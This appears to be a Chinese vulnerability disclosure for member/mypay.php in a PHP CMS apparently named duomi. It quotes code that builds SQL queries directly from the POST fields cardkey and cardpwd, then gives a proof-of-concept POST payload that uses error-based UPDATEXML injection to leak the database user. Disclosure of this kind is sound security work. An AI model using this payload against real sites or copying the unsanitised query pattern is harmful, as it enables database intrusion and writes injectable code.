漏洞文件member/mypay.php(14-40行)

if(empty($_SESSION['duomi_user_id'])){
    showMsg("请先登录","login.php");
    exit();
}
elseif($dm=='mypay'){
    $key=$_POST['cardkey'];
    if($key==""){showMsg("请输入充值卡号","-1");exit;}
    $pwd=$_POST['cardpwd'];
    if($pwd==""){showMsg("请输入充值卡密码","-1");exit;}
    $sqlt="SELECT * FROM duomi_card where ckey='$key'";
    $sqlt="SELECT * FROM duomi_card where cpwd='$pwd'";
       $row1 = $dsql->GetOne($sqlt);
    if(!is_array($row1) OR $row1['status']<>0){
        showMsg("充值卡信息有误","-1");exit;
    }else{
        $uname=$_SESSION['duomi_user_name'];
        $points=$row1['climit'];
        $dsql->executeNoneQuery("UPDATE duomi_card SET    usetime=NOW(),uname='$uname',status='1' WHERE ckey='$key'");
        $dsql->executeNoneQuery("UPDATE duomi_card SET usetime=NOW(),uname='$uname',status='1' WHERE cpwd='$pwd'");
        $dsql->executeNoneQuery("UPDATE duomi_member SET points=points+$points WHERE username='$uname'");
        showMsg("恭喜！充值成功！","mypay.php");exit;
    }
}
else
{

此处的”cardpwd”变量没有进行过滤就以POST提交方式传入了数据库造成注入。 构造POC如下（注意此处需要注册用户并且登陆详情请看该文件1-17行）：

http://localhost/member/mypay.php?dm=mypay
POST：cardpwd=-1' AND (UPDATEXML(1,CONCAT(0x7e,(USER()),0x7e),1)) and '1'='1